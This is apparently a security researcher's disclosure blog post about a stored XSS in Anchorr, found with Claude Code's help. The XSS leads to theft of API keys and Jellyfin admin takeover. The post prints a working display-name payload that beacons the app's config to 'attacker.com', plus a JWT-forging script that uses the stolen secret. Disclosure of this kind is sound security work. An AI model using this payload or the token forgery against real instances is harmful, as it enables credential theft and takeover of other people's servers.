CVE-2026-32891

From Stored XSS to Jellyfin Admin Takeover via API Key Exfiltration in Anchorr

I've been running Anchorr as part of my home media stack for a while. For anyone unfamiliar: Anchorr connects to Jellyfin and Seerr (formerly Jellyseerr) through a Discord bot, allowing Discord users to submit media requests. Those requests get routed back to their linked Jellyfin/Jellyseerr account. Then, using the Jellyseerr connection, the bot pings users in Discord when their requested content is available.

Recently, my friend xdnewlun1 saw a Reddit post about a reported RCE vulnerability in Anchorr. This made both of us very concerned about the level of security in the application, considering it is connected to our Discord server and runs on my home network.

Since we honestly did not want to spend too much time reading through the source code trying to reverse engineer the vulnerabilities identified, we decided to see what Claude could do.

What came out of that research was a stored XSS chain that leaks the full config for Anchorr, including every API key in the stack with a single request.

Methodology

I cloned the latest release of Anchorr, which at the time was 1.4.1. Then I opened the directory in Visual Studio Code with the Claude Code extension attached.

Security Architecture

The first thing I did was go to Claude and have it analyze the codebase for us.

My opening prompt was something like:

Using the source code available. Go through this application line-by-line and analyze the flow of data and the security architecture. Output the findings to "sec_architecture.md"

Below is an abbreviated version of the output:

sec_architecture.md

# Security Architecture — Anchorr 1.4.1

## Overview

Anchorr is a Discord bot and web dashboard for managing Jellyfin/Jellyseerr media requests.

It exposes an HTTP web server, a Jellyfin webhook receiver, a Discord bot, and a WebSocket client.

All components share a single config file that holds every credential.

---

## 1. Authentication & Session Management

**File:** `utils/auth.js`

### JWT Issuance

- Tokens are signed with `jsonwebtoken` using a `JWT_SECRET` loaded at module init via `getOrGenerateJwtSecret()`.

- Priority: config file → `process.env.JWT_SECRET` → auto-generated (`crypto.randomBytes(64).toString("hex")`).

- Tokens encode `{ id, username }`, expire in **7 days** (`expiresIn: "7d"`).

<...>

## 2. Credential & Secret Storage

**File:** `utils/configFile.js`

### Encoding (not encryption)

Sensitive fields are base64-encoded with a `"b64:"` prefix before writing to disk:

```
SENSITIVE_FIELDS = { DISCORD_TOKEN, JELLYSEERR_API_KEY, JELLYFIN_API_KEY,
WEBHOOK_SECRET, JWT_SECRET, TMDB_API_KEY, OMDB_API_KEY }
```

`encodeConfig` applies `Buffer.from(val, "utf8").toString("base64")` with the `b64:` prefix.

`decodeConfig` reverses this on read.

> **This is obfuscation, not encryption.** Base64 is trivially reversible with no key.

<...>

## 3. Web Server & HTTP Security

**File:** `app.js` (lines 2286+)

<...>

### Route Authorization Summary

| Route | Auth Required |
|-------|--------------|
| `POST /api/auth/login` | No |
| `POST /api/auth/register` | No |
| `GET /api/auth/check` | No |
| `GET /api/config` | JWT |

<...>

## 4. Webhook Authentication

## 5. Input Validation

## 6. Discord Bot Security

## 7. External API Communication

## 8. Caching

## 9. Client-Side (Web Dashboard)

**File:** `web/script.js`

### i18n System

Translation keys set via `element.innerHTML = translation` (line 37):

- If translation values contain HTML, this will be rendered as DOM.

- Translation files are served from `/locales/*.json` (static files, no auth required).

- If an attacker can modify locale files on the server, stored XSS is possible.

### Config Exposure

`/api/config` returns the full config object to authenticated sessions, including all API keys (after base64 decode). This is by design for the dashboard UI.

## 10. Logging

## 11. Docker & Deployment

## 12. Dependency Surface (package.json inferred)

Out of this, we learned a few key things:

- This is a single-user system

- Password-based authentication

- The session is based on a JWT, stored in a cookie

- Fully exposed API keys in the config at /api/config

This isn't much new information for the tokens spent, given that we already use this application and knew most of this going in. I could have written this myself. Still, it was worth doing: documenting this in a file gave us two valuable things:

- This is a "memory" that Claude has created, and it's live. We don't have to remind Claude "this isn't a bug, it's a feature"; we can modify the file at will and change the way Claude sees the application.

- The file keeps our context window lean. We don't have to re-explain the architecture in every subsequent prompt, which saves us tokens in the long run.

To be clear: this is not a vulnerability scan. We specifically asked it to document the security architecture. And if you look at the headings, it went pretty in-depth on the codebase.

The goal was to systematically map the attack surface before chasing specific vulnerabilities: auth flow, session management, credential storage, API endpoint behavior, and external data entry points. This gave Claude (and me) a shared, documented view of the attack surface before anything gets flagged as a vulnerability.
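To make the "encoding, not encryption" point from the architecture document concrete, here is a minimal sketch of how a `b64:` value can be reversed by anyone who can read it. The helper names `encodeField` and `decodeField` are made up for illustration (they are not Anchorr's actual `encodeConfig`/`decodeConfig`), and the key is a placeholder.

```javascript
// Hypothetical helpers mirroring the "b64:" scheme described in sec_architecture.md.
// These are illustrative stand-ins, not code copied from Anchorr.
const PREFIX = "b64:";

function encodeField(value) {
  // Base64 needs no key: this is a reversible encoding, not encryption.
  return PREFIX + Buffer.from(value, "utf8").toString("base64");
}

function decodeField(stored) {
  // Values without the prefix are assumed to be plain text already.
  if (typeof stored !== "string" || !stored.startsWith(PREFIX)) return stored;
  return Buffer.from(stored.slice(PREFIX.length), "base64").toString("utf8");
}

const onDisk = encodeField("example-api-key"); // placeholder secret
const recovered = decodeField(onDisk);

console.log(onDisk);    // what would sit in the config file
console.log(recovered); // the original value, recovered without any key
```

Nothing secret is needed for the round trip, which is why the encoded config should be treated as plaintext.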

"Vulnerability Scan"

After creating the architecture document, I wanted to scan for specific vulnerabilities. In our architecture document we already saw a potential sink for XSS and an endpoint that exposes credentials:

### i18n System

Translation keys set via `element.innerHTML = translation` (line 37):

- If translation values contain HTML, this will be rendered as DOM.

- Translation files are served from `/locales/*.json` (static files, no auth required).

- If an attacker can modify locale files on the server, stored XSS is possible.

### Config Exposure

`/api/config` returns the full config object to authenticated sessions, including all API keys (after base64 decode). This is by design for the dashboard UI.

But this doesn't really make sense from an attacker's perspective: we would need to modify locale files on the server to achieve XSS? What it does show us is that innerHTML is used. Searching for it in VS Code, we found 75 references.
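If you want the same list outside the editor, something like the sketch below works. It is a rough helper under my own assumptions (the name `findInnerHtmlSinks` and the sample input are mine, not from Anchorr), and it only tells you where `innerHTML` is assigned, not whether the data reaching it is attacker-controlled.

```javascript
// Sketch: list the lines that assign to innerHTML (= or +=), skipping comparisons.
function findInnerHtmlSinks(source) {
  const sinks = [];
  source.split(/\r?\n/).forEach((text, index) => {
    // Matches ".innerHTML =" and ".innerHTML +=" but not "==" or "===".
    if (/\.innerHTML\s*\+?=(?!=)/.test(text)) {
      sinks.push({ line: index + 1, text: text.trim() });
    }
  });
  return sinks;
}

// Made-up sample input; in practice you would read a file such as web/script.js.
const sample = [
  'title.textContent = user.displayName;',
  'option.innerHTML = `<div>${user.displayName}</div>`;',
  'if (el.innerHTML === "") return;',
  'list.innerHTML += row;',
].join("\n");

const sinkLines = findInnerHtmlSinks(sample).map((s) => s.line);
console.log(sinkLines); // lines 2 and 4 of the sample
```

Each hit still needs a human (or a model) to trace where the interpolated values come from.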

Instead of analyzing each instance manually... let's have Claude do it instead!



So from there, I prompted Claude to perform a "vulnerability scan". The prompt was roughly:

Based on the architecture you just documented, go through this application and look for common vulnerabilities: XSS, SQLI, Path Traversal, JWT exploits, etc. Create vulnscan.md with your findings. Documenting the class of vulnerability, potential rating, how to confirm the issue, and a potential attack chain

This did not initially produce any good XSS findings; it just regurgitated what was already in the architecture document. So I followed up with:

Looking at the source code, do a thorough review for XSS Sinks and possible attack paths

It then added "XSS Surface Map" to the findings.

Below is an outline of the output:

vulnscan.md

Finding the XSS

Now that we have the scan results, we can take a deeper look at any possible sinks.

The report broke down every innerHTML sink in web/script.js by who controls the data and what it takes to trigger execution. Most of them required either write access to the server or some elevated position in the Discord server. But two stood out:

- 6b — Stored XSS via Discord Display Name / Username (no app credentials needed)

- 6c — Stored XSS via Jellyseerr Display Name / Email (no app credentials needed)

Both rated HIGH. Both required nothing more than an account in the respective system. No Anchorr credentials and no knowledge of the Anchorr deployment needed.

I decided to focus on 6c, since I thought it would have a different impact than the Discord finding.

### 6c. [HIGH] Stored XSS via Jellyseerr Display Name / Email (no app credentials needed)

**Sink:** `web/script.js` lines 2110–2121, 2161–2164, 2700–2712

**Data source:** `/api/jellyseerr-users` → Jellyseerr API

Same pattern as 6b but sourced from Jellyseerr user accounts:

```js
option.innerHTML = `
<div class="custom-select-option-name">${user.displayName}</div>
<div class="custom-select-option-username">${user.email}</div>
`;

display.innerHTML = `
<span>${user.displayName}${user.email ? ` (${user.email})` : ""}</span>
`;
```

**Attack chain (no app credentials required):**

1. Attacker is a user on Jellyfin / Jellyseerr.

2. Attacker sets their display name to:

```js

<img src=x onerror="fetch('/api/config').then(r=>r.json()).then(d=>navigator.sendBeacon('https://attacker.com',JSON.stringify(d)))">

```

3. Admin opens the Anchorr dashboard → Mappings tab → member list renders → XSS fires.

4. The payload exfiltrates the full config: all API keys and JWT secret.

**Why `escapeHtml` doesn't help here:** It's used in `displayMappings` (line 2318) for the saved mapping list, but **not** in the live member/user selector dropdowns.

**Test:**

1. Log into Jellyseerr.

2. Change display name to `<img src=x onerror=alert(document.cookie)>`.

3. Log in as admin, open Mappings tab, observe XSS execution.

By default, users in Jellyseerr can change their display name in the user settings. Once changed, user.displayName and user.email are pulled from the Jellyseerr API and dropped straight into innerHTML without escaping. Claude also noted that escapeHtml() already exists in the codebase at line 2935 and is used in other places, just not here.

To trigger the XSS, an admin only has to open the Mappings tab. That is a completely normal place for an admin to browse to, as it is where they pick which Jellyfin user matches which Discord user.
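For reference, this is roughly what escaping those two fields would look like. It's a sketch, not the project's actual patch: the `escapeHtml` body below is a typical implementation I'm assuming (Anchorr's own version isn't shown in this post), and `renderUserOption` is a hypothetical wrapper around the markup from the finding.

```javascript
// Assumed, typical HTML-escaping helper; Anchorr's real escapeHtml may differ.
function escapeHtml(value) {
  if (value == null) return "";
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hypothetical wrapper: same markup as the vulnerable sink, with both fields escaped.
function renderUserOption(user) {
  return `
<div class="custom-select-option-name">${escapeHtml(user.displayName)}</div>
<div class="custom-select-option-username">${escapeHtml(user.email)}</div>
`;
}

const hostile = {
  displayName: "<img src=x onerror=alert(1)>",
  email: "attacker@example.com",
};

const html = renderUserOption(hostile);
console.log(html); // the payload shows up as inert text, not as an <img> element
```

Assigning the name with `textContent` on a created element would avoid the problem as well, since nothing is parsed as HTML in that case.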

What Can You Actually Do With It?

An XSS that pops an alert is already a finding, but without proving impact it's not worth much. As we saw earlier in the architecture document, the config is fully exposed at GET /api/config.

All the following is exposed in the config, in plaintext:

| Field | What it gives an attacker |
|---|---|
| JWT_SECRET | Forge valid admin session tokens indefinitely |
| DISCORD_TOKEN | Full control of the Discord bot |
| JELLYFIN_API_KEY | Full access to the Jellyfin media server |
| JELLYSEERR_API_KEY | Full access to the Jellyseerr request manager |
| WEBHOOK_SECRET | Forge Jellyfin webhook payloads |

So the full chain was:

- Set your Jellyseerr display name to the XSS payload

- Payload fires when admin opens Mappings and calls /api/config

- Beacon the response; you now have JWT_SECRET and every API key in the stack

- Forge a JWT, set it as a cookie, open the dashboard / Gain access to Jellyfin via the leaked API key

And there's no recovery path short of rotating JWT_SECRET, rotating every exposed key, and restarting the service.

Each forged token is valid for 7 days, and new ones can be minted for as long as the secret stays the same.

Building the PoC

I asked Claude to help put together the payload and token forge script. The beacon payload for the display name field:

<img src=x onerror="fetch('/api/config').then(r=>r.json()).then(d=>navigator.sendBeacon('https://attacker.com',JSON.stringify(d)))">

I set up a listener using Burp Collaborator, then waited for the admin to open Mappings.

Aaannnnnddd after no time at all, because this is my environment, the full JSON config arrives on the other end.

From there, forging a session can be done fairly quickly:

// Forge an admin session token with the exfiltrated secret (requires: npm install jsonwebtoken)
const jwt = require('jsonwebtoken');

const token = jwt.sign(
  { id: '1', username: 'admin' }, // same claim shape the app issues: { id, username }
  '<exfiltrated JWT_SECRET>',
  { expiresIn: '7d' } // matches the app's 7-day token lifetime
);

console.log(token);

Set the token as a cookie in the browser and the dashboard opens as admin. Confirmed against my own instance.
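To see why the leaked secret is all you need, and why rotating it is the only way to kill forged tokens, here is a sketch of HS256 signing and verification using only Node's built-in `crypto` module. It assumes Anchorr relies on `jsonwebtoken`'s default HS256 algorithm; `signHs256`, `verifyHs256`, and the secret strings are illustrative names and placeholders, and the verifier skips the `exp` check a real library performs.

```javascript
const crypto = require("crypto");

const b64url = (input) => Buffer.from(input).toString("base64url");

// Sign a payload as an HS256 JWT: base64url(header).base64url(payload).signature
function signHs256(payload, secret) {
  const header = b64url(JSON.stringify({ alg: "HS256", typ: "JWT" }));
  const body = b64url(JSON.stringify(payload));
  const signature = crypto
    .createHmac("sha256", secret)
    .update(`${header}.${body}`)
    .digest("base64url");
  return `${header}.${body}.${signature}`;
}

// Signature check only (no exp/iat validation): recompute the HMAC and compare.
function verifyHs256(token, secret) {
  const [header, body, signature] = token.split(".");
  if (!header || !body || !signature) return false;
  const expected = crypto
    .createHmac("sha256", secret)
    .update(`${header}.${body}`)
    .digest();
  const given = Buffer.from(signature, "base64url");
  return given.length === expected.length && crypto.timingSafeEqual(given, expected);
}

const secret = "leaked-secret-placeholder"; // stands in for the exfiltrated JWT_SECRET
const now = Math.floor(Date.now() / 1000);
const forged = signHs256(
  { id: "1", username: "admin", iat: now, exp: now + 7 * 24 * 3600 },
  secret
);

console.log(verifyHs256(forged, secret));           // true: server cannot tell it from a real token
console.log(verifyHs256(forged, "rotated-secret")); // false: rotation invalidates forged tokens
```

The server has no way to distinguish a token it issued from one the attacker signed, because both are just an HMAC over the same secret.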

Conclusion

I should mention that a lot of steps were left out to keep this blog post short.

While Claude is strong at analyzing code paths, it tends to exaggerate the severity of findings. A good example: it flagged a "Critical XSS" in the i18n translation files. Technically, that's true: there is an XSS sink there. However, those files are never touched by the end user. Once you call Claude out, it does recognize that it's wrong. But you have to keep doing so until you get to the result that you are looking for.

Often, Claude is wrong. But with enough guidance from a human, you can get good results. Making sure that you are prompting it in a productive manner leads to better results. Who would've thought?

The biggest thing that improved the accuracy of the findings and helped me analyze the code was a two-step approach: architecture first, vulnerability scan second. This helped me see which common mistakes the developers were making and where else I should be looking for them.

The key to using Claude (or any other AI tool) is to treat it as what it is: a tool to speed up your workflow, not a source of truth and not a replacement for your judgment.